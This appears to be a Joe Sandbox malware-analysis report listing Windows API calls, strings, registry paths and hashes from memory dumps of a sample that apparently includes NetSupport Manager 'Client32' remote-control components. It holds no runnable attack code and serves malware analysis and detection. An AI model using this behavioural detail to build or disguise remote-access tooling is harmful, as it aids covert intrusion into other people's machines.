                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                                        • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                        • API String ID: 3299820421-2117887902
                                                                                        • Opcode ID: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
                                                                                        • Instruction ID: 1fcbe558ef897eaa1b38a7330f4b62b9d1ba330f7a3c6d488077e096d0eda0f8
                                                                                        • Opcode Fuzzy Hash: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
                                                                                        • Instruction Fuzzy Hash: 6D51D9B1E0022BEFEB51CF60CD41F9EF7B9AB04B08F104199F519A7941E7716A48CB91
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,6D1D67B5), ref: 6D1C8D6B
                                                                                          • Part of subcall function 6D1C4F70: LoadLibraryA.KERNEL32(psapi.dll,?,6D1C8DC8), ref: 6D1C4F78
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 6D1C8DCB
                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 6D1C8DD8
                                                                                        • FreeLibrary.KERNEL32(?), ref: 6D1C8EBF
                                                                                          • Part of subcall function 6D1C4FB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6D1C4FC4
                                                                                          • Part of subcall function 6D1C4FB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6D1C8E0D,00000000,?,6D1C8E0D,00000000,?,00000FA0,?), ref: 6D1C4FE4
                                                                                        • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6D1C8EAE
                                                                                          • Part of subcall function 6D1C5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6D1C5014
                                                                                          • Part of subcall function 6D1C5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6D1C8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6D1C5034
                                                                                          • Part of subcall function 6D1C2420: _strrchr.LIBCMT ref: 6D1C242E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Process$AddressFileLibraryModuleNameProc$CloseCurrentEnumFreeHandleLoadModulesOpen_strrchr
                                                                                        • String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
                                                                                        • API String ID: 2714439535-3484705551
                                                                                        • Opcode ID: 39f780be10f06678604523ed8e498e2323aded7378436e4387863c90f1ff3562
                                                                                        • Instruction ID: 9639c7966b58bd5f1189f8bd0b2b71d3130b39b666341a11f0d7d719647bc2a1
                                                                                        • Opcode Fuzzy Hash: 39f780be10f06678604523ed8e498e2323aded7378436e4387863c90f1ff3562
                                                                                        • Instruction Fuzzy Hash: 164119719442199BEB14DB51DC85FFBB7B8EB65708F004059EB04E3149EBF89A84CF62
                                                                                        APIs
                                                                                        • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115E3A8
                                                                                        • GetLastError.KERNEL32 ref: 1115E3B5
                                                                                        • wsprintfA.USER32 ref: 1115E3C8
                                                                                          • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                          • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                          • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                          • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                          • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                          • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                        • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115E40C
                                                                                        • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115E419
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                        • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                        • API String ID: 1734919802-1728070458
                                                                                        • Opcode ID: c283eabc343593951191b6a2689ac3898b07c71967e340f2684f7c9ae3ac2948
                                                                                        • Instruction ID: 2151ae3f148807adf1b9b51829e7bc1db46dc9b6ec15270657221fcdabbc1952
                                                                                        • Opcode Fuzzy Hash: c283eabc343593951191b6a2689ac3898b07c71967e340f2684f7c9ae3ac2948
                                                                                        • Instruction Fuzzy Hash: 1B110479A01319ABC720EFE69C84A96F7B4FF2231CB40822EE46543240DA706944CB51
                                                                                        APIs
                                                                                          • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                          • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                          • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                        • std::exception::exception.LIBCMT ref: 1111013A
                                                                                        • __CxxThrowException@8.LIBCMT ref: 1111014F
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                        • InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                        • InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                        • EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                        • LeaveCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111024F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                        • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                        • API String ID: 1976012330-1024648535
                                                                                        • Opcode ID: 8c7ff18307fdfc7dc9cfa15ec2f4ee6c8e6ccf2b204cd545ae2c61337709aa2b
                                                                                        • Instruction ID: 7e481d80fa827a07ee7257280804c30d2ae959ce5d98406b053f8524d928f6e4
                                                                                        • Opcode Fuzzy Hash: 8c7ff18307fdfc7dc9cfa15ec2f4ee6c8e6ccf2b204cd545ae2c61337709aa2b
                                                                                        • Instruction Fuzzy Hash: 6C41C2B5E00216AFDB11CFB98C84BAEFBF5FB48708F00453AE815DB244E675A944CB91
                                                                                        APIs
                                                                                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,1117F505,00000000,00000000,461C6054,00000000,?,00000000), ref: 11060874
                                                                                        • _malloc.LIBCMT ref: 110608BB
                                                                                          • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                          • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                          • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                          • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        • RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,000000FF,?,461C6054,00000000), ref: 110608FB
                                                                                        • RegEnumValueA.ADVAPI32(?,00000000,?,00000100,00000000,?,000000FF,?), ref: 11060962
                                                                                        • _free.LIBCMT ref: 11060974
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: EnumValue$ErrorExitInfoLastMessageProcessQuery_free_mallocwsprintf
                                                                                        • String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
                                                                                        • API String ID: 999355418-161875503
                                                                                        • Opcode ID: b352b509771dcc32ad87cfb6a45288db3d7f81144d707e567bf323ae8f0cc4e3
                                                                                        • Instruction ID: c47c75eefe38bee888b154a00c4449ad07b8701d7df13cace45a3bfee881b040
                                                                                        • Opcode Fuzzy Hash: b352b509771dcc32ad87cfb6a45288db3d7f81144d707e567bf323ae8f0cc4e3
                                                                                        • Instruction Fuzzy Hash: E3A1B075A007469FE721CF64C880BABFBF8AF45308F044A5CE99697684E770F508CBA1
                                                                                        APIs
                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,461C6054,00000000,?), ref: 1115BA67
                                                                                        • CoCreateInstance.OLE32(111C4FEC,00000000,00000017,111C4F1C,?), ref: 1115BA87
                                                                                        • wsprintfW.USER32 ref: 1115BAA7
                                                                                        • SysAllocString.OLEAUT32(?), ref: 1115BAB3
                                                                                        • wsprintfW.USER32 ref: 1115BB67
                                                                                        • SysFreeString.OLEAUT32(?), ref: 1115BC08
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                        • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                        • API String ID: 3050498177-823534439
                                                                                        • Opcode ID: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
                                                                                        • Instruction ID: 667e066b75244b2782fe63ff2368f72f8a2c2363a2cb4bcdb988270c73b3585f
                                                                                        • Opcode Fuzzy Hash: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
                                                                                        • Instruction Fuzzy Hash: 7351B071B00219ABC764CF69CC84F9AF7B9FB8A714F1042A8E429E7240DA70AE40CF55
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,6D1E0F2B,7AB33BE4,00000000,?,?,6D1FF278,000000FF,?,6D1CAE0A,?,00000000,?,00000080), ref: 6D1E0D48
                                                                                        • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 6D1E0D5B
                                                                                        • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-6D20CB4C,?,?,6D1FF278,000000FF,?,6D1CAE0A,?,00000000,?,00000080), ref: 6D1E0D76
                                                                                        • _malloc.LIBCMT ref: 6D1E0D8C
                                                                                          • Part of subcall function 6D1E1B69: __FF_MSGBANNER.LIBCMT ref: 6D1E1B82
                                                                                          • Part of subcall function 6D1E1B69: __NMSG_WRITE.LIBCMT ref: 6D1E1B89
                                                                                          • Part of subcall function 6D1E1B69: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,6D1ED3C1,6D1E6E81,00000001,6D1E6E81,?,6D1EF447,00000018,6D207738,0000000C,6D1EF4D7), ref: 6D1E1BAE
                                                                                        • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,6D1FF278,000000FF,?,6D1CAE0A,?,00000000,?), ref: 6D1E0D9F
                                                                                        • _free.LIBCMT ref: 6D1E0D84
                                                                                          • Part of subcall function 6D1E1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 6D1E1C13
                                                                                          • Part of subcall function 6D1E1BFD: GetLastError.KERNEL32(00000000), ref: 6D1E1C25
                                                                                        • _free.LIBCMT ref: 6D1E0DAF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AdaptersAddressesHeap_free$AddressAllocErrorFreeLastLibraryLoadProc_malloc
                                                                                        • String ID: GetAdaptersAddresses$IPHLPAPI.DLL
                                                                                        • API String ID: 3205077458-1843585929
                                                                                        • Opcode ID: 3f2985d5282f4aa00c239b2c6d6a99c4e926f3ab8549bd16088607b5740a6a43
                                                                                        • Instruction ID: b7674c1aff251a694a198282ac1b75d7be64c2bef42753cd3cc524aa2117c84f
                                                                                        • Opcode Fuzzy Hash: 3f2985d5282f4aa00c239b2c6d6a99c4e926f3ab8549bd16088607b5740a6a43
                                                                                        • Instruction Fuzzy Hash: F701D4B5200B026BE7208B718C88F6776ACAB55B44F10881CF65A9B288EAB1F480C764
                                                                                        APIs
                                                                                          • Part of subcall function 11145330: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
                                                                                          • Part of subcall function 11145330: RegCloseKey.ADVAPI32(?), ref: 11145404
                                                                                        • _memset.LIBCMT ref: 11145485
                                                                                        • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                        • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                        • GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                                        • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                        • API String ID: 4251163631-545709139
                                                                                        • Opcode ID: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
                                                                                        • Instruction ID: 76ed8f4553af2ae4cc76032582d3c5cf4b75be54885724a55a46303ac3459834
                                                                                        • Opcode Fuzzy Hash: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
                                                                                        • Instruction Fuzzy Hash: 07313971E002299BD761DF74D984BE9F7B6EB08729F540164E42DC7A80D7344984CF91
                                                                                        APIs
                                                                                        • wsprintfA.USER32 ref: 110150CA
                                                                                        • _memset.LIBCMT ref: 1101510E
                                                                                        • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015148
                                                                                        Strings
                                                                                        • %012d, xrefs: 110150C4
                                                                                        • PackedCatalogItem, xrefs: 11015132
                                                                                        • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101504B
                                                                                        • NSLSP, xrefs: 11015158
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: QueryValue_memsetwsprintf
                                                                                        • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                        • API String ID: 1333399081-1346142259
                                                                                        • Opcode ID: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
                                                                                        • Instruction ID: d38f3a4d66d5a90606c53f5b1b84405609ec5bb3b13ff7cea0d7775b25b40b12
                                                                                        • Opcode Fuzzy Hash: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
                                                                                        • Instruction Fuzzy Hash: C6419D71D02269AFEB11DB64CC90BDEF7B8EB44314F0445E9E819A7281EB35AB48CF50
                                                                                        APIs
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100FDED
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100FE10
                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 1100FE94
                                                                                        • __CxxThrowException@8.LIBCMT ref: 1100FEA2
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100FEB5
                                                                                        • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100FECF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
